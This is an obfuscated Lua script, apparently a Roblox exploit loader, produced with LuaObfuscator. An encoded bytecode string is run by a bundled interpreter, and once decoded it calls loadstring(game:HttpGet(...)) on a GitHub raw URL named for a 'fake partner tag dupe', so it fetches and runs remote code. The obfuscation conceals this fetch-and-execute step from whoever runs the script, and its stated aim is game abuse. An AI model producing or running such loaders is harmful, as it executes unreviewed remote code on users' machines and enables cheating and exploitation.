--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v16=function(v17,v18,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==0) then v28=1;v29=nil;v17=v5(v4(v17,5),"..",function(v40)if (v2(v40,2)==79) then v29=v1(v4(v40,1,1));return "";else local v85=v3(v1(v40,16));if v29 then local v88=v6(v85,v29);v29=nil;return v88;else return v85;end end end);v27=1;end if (v27==7) then v39=function(v41,v42,v43)local v48=v41[1];local v49=v41[2];local v50=v41[3];return function(...)local v79=0;local v80;local v81;local v82;local v83;local v84;while true do if (v79==1) then v82={...};v83=v13("#",...) -1 ;v79=2;end if (v79==2) then v84=nil;v84=function()local v91=v48;local v92=v49;local v93=v50;local v94=v37;local v95={};local v96={};local v97={};for v102=0 -0 ,v83 do if ((v102>=v93) or ((770 + 567)>=(6928 -5401))) then v95[v102-v93 ]=v82[v102 + ((3535 -(1341 + 499)) -(927 + 767)) ];else v97[v102]=v82[v102 + (3 -2) ];end end local v98=(v83-v93) + ((7 -4) -(2 + 0)) ;local v99;local v100;while true do local v103=1185 -(91 + 1094) ;local v104;local v105;while true do if (((1125 + 762)>=(1618 -(40 + 1005))) and ((0 + 0)==v103)) then v104=1383 -(446 + 937) ;v105=nil;v103=817 -(636 + 180) ;end if ((v103==1) or ((2576 + 200)<=(163 -124))) then while true do if ((((1899 -(1684 + 215)) + 0)==v104) or ((3791 + 729)<=(4214 -(1078 + 41 + 12)))) then v105=0;while true do if ((v105==(0 + 0)) or (3130<(1042 + 474))) then local v121=0;local v122;while true do if ((v121==0) or ((6215 -(342 + 1019))<(2453 + 2110))) then v122=(192 + 1549) -(111 + 1630) ;while true do if ((v122==(1 -0)) or ((3893 -(768 + 284))>=(1268 + 2532))) then v105=3 -2 ;break;end if ((v122==(1535 -(1447 + 88))) or (116==(326 + 266 + 433))) then local v133=0 + 0 ;while true do if (((2625 -1574)<4821) and (v133==(1 -(1239 -(941 + 298))))) then v122=(199 -(81 + 117)) + 0 ;break;end if (((1799 -(757 + 1042))==v133) or ((1492 -(72 + 430))>(8863 -(7808 -(24 + 1926))))) then v99=v91[v80];v100=v99[1];v133=1 + 0 ;end end end end break;end end end if ((((6052 -(10 + 440)) -3304)<=4485) and (v105==1)) then if ((v100<=(1 + 1)) or (2169>(3918 -(44 + 221)))) then if (((8442 -(404 + 5454))<=((5485 + 13898) -14444)) and (v100<=0)) then local v126=0;local v127;local v128;local v129;local v130;local v131;while true do if ((2==v126) or ((6383 -2011)<(2880 -(23 + 370)))) then v131=nil;while true do if (((2905 -(488 + 99))==(3578 -(4 + 1256))) and (v127==(0 -0))) then local v156=0 -0 ;local v157;while true do if (((1171 -(540 + 586 + 45))==v156) or ((2513 + 170)<768)) then v157=1607 -(110 + 1497) ;while true do if (((1 + 0)==v157) or ((1471 -(102 + 801))>=(660 + 497))) then v127=3 -2 ;break;end if (((3263 + 759)>(3755 -(1034 + 576))) and (v157==(83 -(8 + 75)))) then local v180=0;while true do if (((1 + 0)==v180) or ((36 + 243)<(772 -544))) then v157=1 -0 ;break;end if ((v180==(0 + 0 + 0)) or (4137>(6436 -(577 + 1225)))) then v128=v99[1 + 1 ];v129,v130=v94(v97[v128](v14(v97,v128 + 1 ,v99[1693 -(114 + 1576) ])));v180=887 -(426 + 143 + 317) ;end end end end break;end end end if ((v127==(1 + 0)) or (((8753 -4596) -(1248 + 279))==(5655 -2104))) then local v158=0 + 0 ;while true do if ((v158==1) or ((7 + 4)>(1125 -(314 + 416)))) then v127=(4 -1) -1 ;break;end if ((v158==0) or ((2529 -(925 -(140 + 145)))>=(13389 -8439))) then local v168=0;while true do if ((v168==(1 -0)) or ((5928 -(531 + 442 + 388))<(3604 -(398 + 250)))) then v158=1;break;end if ((0==v168) or (737>=(164 + 1003))) then v81=(v130 + v128) -(1 + 0) ;v131=0 + 0 ;v168=2 -1 ;end end end end end if (((2798 -(1109 + 197))==(1977 -((991 -763) + 257))) and (2==v127)) then for v159=v128,v81 do local v160=0 + (0 -0) ;local v161;while true do if ((v160==((0 -0) + 0)) or ((3469 + 706)==((3098 -(465 + 1435)) -489))) then v161=0 + 0 ;while true do if (((9638 -5239)==(5222 -(679 + 144))) and (v161==(0 + 0))) then v131=v131 + 1 + 0 ;v97[v159]=v129[v131];break;end end break;end end end break;end end break;end if (((1995 + 2156)==(6762 -2611)) and ((394 -(194 + 200))==v126)) then v127=(1488 -(904 + 584)) -0 ;v128=nil;v126=3 -2 ;end if ((v126==(1 + (0 -0))) or ((7035 -2812)<(283 + 320))) then local v146=0 -0 ;while true do if (((490 + 145)==(1912 -1277)) and (v146==1)) then v126=8 -6 ;break;end if (((5521 -(27 + 1682))>=(340 + 2999)) and (v146==(487 -(307 + 180)))) then v129=nil;v130=nil;v146=1;end end end end elseif (((1713 + 39)==(3441 -1689)) and (v100==(2 -1))) then v97[v99[8 -6 ]]=v99[3 + (0 -0) ];else local v136=0 + 0 ;local v137;local v138;local v139;local v140;while true do if ((v136==(6 -4)) or (1423==(3350 -(41 + 712)))) then while true do if ((v137==(1183 -(844 + 82 + 257))) or ((2314 -(267 + 41))==(4337 + 402))) then local v162=0 -0 ;while true do if ((1998==(4845 -2847)) and (v162==((27 + 413) -((1380 -974) + 33)))) then v137=1 + 0 ;break;end if (((5900 -3123)>=(545 -307)) and (v162==(0 + 0))) then v138=0;v139=nil;v162=4 -3 ;end end end if (((2382 + 1926)>(5869 -(594 + 1023))) and (v137==(1 -0))) then v140=nil;while true do if ((30<=((3625 -(1196 + 147)) + 1979)) and (0==v138)) then local v175=0 -0 ;local v176;while true do if (((4013 -(796 + 909))==(2867 -(424 + 135))) and (v175==(0 + (1186 -(643 + 543))))) then v176=0 -0 ;while true do if ((v176==(1 -0)) or ((665 + 590)>=(2383 + 1311 + 667))) then v138=1470 -(1408 + 61) ;break;end if ((v176==(0 + 0)) or (57>4336)) then v139=v99[5 -3 ];v140=v97[v99[1653 -(398 + 1252) ]];v176=2 -1 ;end end break;end end end if ((v138==(1 -0)) or (2567>(5285 -((1457 -858) + 618)))) then v97[v139 + (3 -(5 -3)) ]=v140;v97[v139]=v140[v99[4]];break;end end break;end end break;end if (((2363 -1659)<(1828 + 2327)) and (v136==(1320 -((651 -(100 + 4)) + 772)))) then v139=nil;v140=nil;v136=2 + 0 ;end if ((v136==(0 + (356 -(129 + 227)))) or ((3507 + 1029)<=3969)) then v137=0 + 0 ;v138=nil;v136=1328 -(663 + 664) ;end end end elseif ((v100<=4) or (27>3887)) then if ((((7662 -5464) -1503)<=(1757 -(341 + 208))) and (v100==((2 + 4) -3))) then v97[v99[2]]();else local v141=0 + 0 + 0 ;local v142;local v143;while true do if ((v141==0) or ((6537 -4295)>=4301)) then v142=(132 -92) -(9 + 31) ;v143=nil;v141=1572 -(1306 + 265) ;end if ((((7247 -(226 + 1522)) -(17 + 856))==((6851 + 2944) -5169)) and (v141==(1395 -(109 + 1285)))) then while true do if (((5537 -(1304 + (929 -437)))==(5724 -(862 + 1121))) and (0==v142)) then v143=v99[4 -2 ];v97[v143]=v97[v143](v14(v97,v143 + (3 -2) ,v81));break;end end break;end end end elseif (((600 + 88)<(546 + 1258)) and (v100==((1886 -1077) -(255 + 549)))) then v97[v99[1 + 1 ]]=v43[v99[5 -2 ]];else do return;end end v80=v80 + 1 ;break;end end break;end end break;end end end end;v79=3;end if (3==v79) then A,B=v37(v12(v84));if  not A[1] then local v106=v41[4][v80] or "?" ;error("Script error at ["   .. v106   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end if (v79==0) then v80=1;v81= -1;v79=1;end end end;end;return v39(v38(),{},v18)(...);end if (6==v27) then v38=nil;v38=function()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(1086 -(903 + 180))) then v58=nil;v59=nil;v51=4;end if (0==v51) then v52=0;v53=nil;v51=2 -1 ;end if (v51~=4) then else while true do if (v52~=3) then else v59=nil;while true do local v112=0 -0 ;local v113;while true do if (v112==(0 + 0)) then v113=0;while true do if (v113~=0) then else local v119=0;local v120;while true do if (v119==(0 + 0)) then v120=0;while true do if (v120==1) then v113=1164 -(142 + 1021) ;break;end if (v120==(0 -0)) then local v132=0;while true do if (v132==(1 + 0)) then v120=1;break;end if (v132~=(0 -0)) then else if (v53==(107 -(53 + 53))) then local v149=50 -(33 + 17) ;while true do if (1==v149) then for v169=1 -0 ,v58 do local v170=861 -(599 + 262) ;local v171;local v172;local v173;while true do if (v170~=0) then else local v181=0 -0 ;while true do if (v181==(0 + 0)) then v171=0;v172=nil;v181=489 -(84 + 404) ;end if (v181==(385 -(153 + 231))) then v170=483 -(15 + 467) ;break;end end end if ((484 -(144 + 339))==v170) then v173=nil;while true do if (v171==1) then if (v172==1) then v173=v31()~=(656 -(472 + 184)) ;elseif (v172==(593 -(242 + 349))) then v173=v34();elseif (v172~=3) then else v173=v35();end v59[v169]=v173;break;end if (v171==(0 + 0)) then local v188=0;while true do if ((1709 -(510 + 1199))==v188) then local v198=0 + 0 ;while true do if (v198~=(271 -(14 + 257))) then else v172=v31();v173=nil;v198=1;end if (v198==(1296 -(161 + 1134))) then v188=1;break;end end end if (v188~=(1 + 0)) then else v171=1;break;end end end end break;end end end v57[3]=v31();v149=2;end if (v149==(1 + 1)) then v53=2;break;end if (v149==(594 -(145 + 449))) then local v166=631 -(430 + 201) ;local v167;while true do if ((0 + 0)~=v166) then else v167=1398 -(904 + 494) ;while true do if (v167==0) then v58=v33();v59={};v167=1;end if (v167==1) then v149=1;break;end end break;end end end end end if (v53==2) then local v150=0;local v151;while true do if (v150==0) then v151=0;while true do local v174=0 -0 ;while true do if (v174==(1044 -(302 + 742))) then if (v151~=(0 + 0)) then else for v189=1031 -(620 + 410) ,v33() do local v190=0;local v191;local v192;local v193;while true do if (v190==1) then v193=nil;while true do if (v191~=(1 -0)) then else while true do if ((0 -0)~=v192) then else v193=v31();if (v30(v193,1,1)==(0 -0)) then local v203=0 + 0 ;local v204;local v205;local v206;local v207;while true do if (v203~=1) then else local v208=1083 -(453 + 630) ;local v209;while true do if (v208==0) then v209=0;while true do if (v209~=0) then else v206=nil;v207=nil;v209=1;end if (v209~=(3 -2)) then else v203=2;break;end end break;end end end if (v203==(2 + 0)) then while true do if (v204==(1279 -(865 + 413))) then local v211=0;local v212;while true do if (v211==0) then v212=0;while true do if (v212~=(0 + 0)) then else local v220=0;while true do if ((0 -0)~=v220) then else v207={v32(),v32(),nil,nil};if (v205==0) then local v224=178 -(92 + 86) ;while true do if (v224~=(0 + 0)) then else v207[1213 -(667 + 543) ]=v32();v207[4]=v32();break;end end elseif (v205==1) then v207[3]=v33();elseif (v205==2) then v207[7 -4 ]=v33() -((2 + 0)^16) ;elseif (v205==3) then local v234=732 -(38 + 694) ;local v235;local v236;while true do if (v234~=(0 -0)) then else v235=0 -0 ;v236=nil;v234=773 -(223 + 549) ;end if (v234==(1 + 0)) then while true do if (v235==(0 + 0)) then v236=0;while true do if (v236~=0) then else v207[3]=v33() -((2 + 0)^16) ;v207[6 -2 ]=v32();break;end end break;end end break;end end end v220=1;end if (v220~=1) then else v212=1210 -(166 + 1043) ;break;end end end if (v212~=(1 + 0)) then else v204=2 -0 ;break;end end break;end end end if (v204~=(3 -1)) then else local v213=0 + 0 ;local v214;while true do if (v213==(0 + 0)) then v214=0;while true do if (v214~=(1849 -(36 + 1813))) then else local v221=0;while true do if (v221==(0 -0)) then if (v30(v206,1 -0 ,1 -0 )~=1) then else v207[1411 -(560 + 849) ]=v59[v207[2]];end if (v30(v206,2,635 -(266 + 367) )~=(1345 -(455 + 889))) then else v207[3]=v59[v207[3]];end v221=1;end if (v221~=1) then else v214=1;break;end end end if ((1 -0)==v214) then v204=2 + 1 ;break;end end break;end end end if (v204~=(0 -0)) then else local v215=0 -0 ;local v216;while true do if (v215~=(0 + 0)) then else v216=0 + 0 ;while true do if (v216~=(1422 -(987 + 434))) then else v204=1 + 0 ;break;end if (v216==(0 + 0)) then local v222=0;local v223;while true do if ((0 -0)==v222) then v223=0 + 0 ;while true do if (v223==1) then v216=1 + 0 ;break;end if (v223~=0) then else local v229=0;while true do if (v229==0) then v205=v30(v193,2,1 + 2 );v206=v30(v193,4,2 + 4 );v229=1;end if (v229==(3 -2)) then v223=1 + 0 ;break;end end end end break;end end end end break;end end end if (v204~=3) then else if (v30(v206,1419 -(356 + 1060) ,3)==1) then v207[4]=v59[v207[4]];end v54[v189]=v207;break;end end break;end if (v203~=0) then else local v210=0 -0 ;while true do if (v210==(0 -0)) then v204=807 -(187 + 620) ;v205=nil;v210=2 -1 ;end if (v210==1) then v203=1;break;end end end end end break;end end break;end if (v191==0) then v192=1956 -(1384 + 572) ;v193=nil;v191=1 + 0 ;end end break;end if (v190~=(1098 -(232 + 866))) then else local v199=0 + 0 ;while true do if (v199==1) then v190=1;break;end if (v199==0) then v191=1640 -(1180 + 460) ;v192=nil;v199=1280 -(1266 + 13) ;end end end end end for v194=3 -2 ,v33() do v55[v194-1 ]=v38();end v151=1;end if ((1 + 0)==v151) then local v184=0 + 0 ;local v185;while true do if (v184~=0) then else v185=0 + 0 ;while true do if (v185==0) then local v200=1981 -(100 + 1881) ;while true do if (v200==(0 + 0)) then for v201=1,v33() do v56[v201]=v33();end return v57;end end end end break;end end end break;end end end break;end end end v132=1;end end end end break;end end end if (v113~=1) then else if (v53~=0) then else local v123=0;local v124;local v125;while true do if (v123==(65 -(34 + 31))) then v124=0;v125=nil;v123=1164 -(1133 + 30) ;end if (v123~=1) then else while true do if (v124==(1406 -(949 + 457))) then v125=0;while true do if (v125==(2 + 0)) then v53=1;break;end if (v125==0) then local v152=730 -(76 + 654) ;local v153;while true do if (v152==0) then v153=1287 -(768 + 519) ;while true do if (v153==(1303 -(826 + 476))) then v125=1 + 0 ;break;end if (v153~=0) then else v54={};v55={};v153=1315 -(899 + 415) ;end end break;end end end if (v125==(1699 -(60 + 1638))) then local v154=0 + 0 ;local v155;while true do if (v154~=(1927 -(982 + 945))) then else v155=616 -(116 + 500) ;while true do if (v155~=(807 -(26 + 781))) then else v56={};v57={v54,v55,nil,v56};v155=1;end if (v155==(1 + 0)) then v125=2;break;end end break;end end end end break;end end break;end end end break;end end break;end end end break;end if (v52==(1 + 0)) then local v107=0 + 0 ;local v108;while true do if (v107==(1213 -(822 + 391))) then v108=0;while true do if (1==v108) then v52=460 -(186 + 272) ;break;end if (0~=v108) then else v55=nil;v56=nil;v108=1;end end break;end end end if (v52==(685 -(288 + 395))) then local v109=0 + 0 ;while true do if (v109==(80 -(4 + 76))) then v57=nil;v58=nil;v109=1013 -(343 + 669) ;end if (1==v109) then v52=3 + 0 ;break;end end end if (v52==0) then local v110=0;local v111;while true do if (v110~=(328 -(319 + 9))) then else v111=683 -(489 + 194) ;while true do if (v111==(0 + 0)) then local v118=0;while true do if ((1780 -(1567 + 213))==v118) then v53=0 + 0 ;v54=nil;v118=4 -3 ;end if (v118==(1916 -(1047 + 868))) then v111=1 + 0 ;break;end end end if (v111~=1) then else v52=1;break;end end break;end end end end break;end if (v51==2) then v56=nil;v57=nil;v51=8 -5 ;end if (v51==(1 -0)) then v54=nil;v55=nil;v51=2;end end end;v39=nil;v27=7;end if (v27==1) then v30=nil;v30=function(v44,v45,v46)if v46 then local v86=(v44/(((6 -4) -0)^(v45-1)))%(2^(((v46-(3 -2)) -(v45-(1 + 0))) + 1)) ;return v86-(v86%(1 -0)) ;else local v87=(1481 -(194 + 1285))^(v45-((231 -(130 + 100)) -0)) ;return (((v44%(v87 + v87))>=v87) and ((3 -2) + 0)) or (0 + 0) ;end end;v31=nil;v27=2;end if (v27==3) then v33=nil;v33=function()local v60=0 + 0 ;local v61;local v62;local v63;local v64;while true do if (v60==(1933 -(1128 + 805))) then v61,v62,v63,v64=v2(v17,v28,v28 + (1438 -(619 + 816)) );v28=v28 + ((474 -(33 + 434)) -3) ;v60=1 + 0 ;end if (v60==((1189 -(78 + 1110)) + 0)) then return (v64 * (16778097 -(772 + (409 -300)))) + (v63 * (31144 + (61696 -27304))) + (v62 * (192 + 64)) + v61 ;end end end;v34=nil;v27=4;end if (v27==4) then v34=function()local v65=0 + 0 ;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v65==(1 + 2)) then if (v70==(0 -0)) then if (v69==(628 -(379 + 249))) then return v71 * (0 -0) ;else v70=1 -(0 -0) ;v68=0 -0 ;end elseif (v70==(4530 -2483)) then return ((v69==(78 -(29 + 49))) and (v71 * ((1 + (1972 -(696 + 1276)))/(0 -0)))) or (v71 * NaN) ;end return v9(v71,v70-(2269 -(305 + 941)) ) * (v68 + (v69/((1 + 1)^(111 -59)))) ;end if (v65==(2 -1)) then v68=1 + 0 ;v69=(v30(v67,1 + 0 ,20) * ((1646 -(383 + 1261))^(8 + 24))) + v66 ;v65=3 -1 ;end if (v65==(0 -0)) then v66=v33();v67=v33();v65=(172 + 1493) -(862 + 802) ;end if (v65==(543 -(402 + 139))) then v70=v30(v67,1144 -(833 + (814 -524)) ,663 -(198 + 434) );v71=((v30(v67,1852 -(720 + 505 + 595) )==(1582 -(1462 + 119))) and  -(1 + 0)) or (1 -0) ;v65=14 -11 ;end end end;v35=nil;v35=function(v47)local v72=904 -(880 + 24) ;local v73;local v74;while true do if (v72==3) then return v7(v74);end if ((8 -6)==v72) then v74={};for v89=3 -2 , #v73 do v74[v89]=v3(v2(v4(v73,v89,v89)));end v72=3;end if (v72==(0 -0)) then v73=nil;if  not v47 then local v101=0 + 0 ;while true do if ((1707 -(1189 + 518))==v101) then v47=v33();if (v47==(0 + 0)) then return "";end break;end end end v72=(1024 -(475 + 548)) + 0 ;end if (v72==((2 + 0) -1)) then v73=v4(v17,v28,(v28 + v47) -(1 + 0) );v28=v28 + v47 ;v72=(1968 -(227 + 1273)) -(53 + 413) ;end end end;v27=5;end if (v27==2) then v31=function()local v75=0 + 0 ;local v76;while true do if (v75==(364 -(78 + 286))) then v76=v2(v17,v28,v28);v28=v28 + (222 -(129 + 92)) ;v75=1;end if (1==v75) then return v76;end end end;v32=nil;v32=function()local v77,v78=v2(v17,v28,v28 + (4 -2) );v28=v28 + 2 ;return (v78 * (252 + 4)) + v77 ;end;v27=3;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F566573747956352F66616B65706172746E6572746167647570652F6D61696E2F66616B65706172746E65726475706500083O0012053O00013O001205000100023O002002000100010003001201000300046O000100034O00045O00022O00033O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end end end
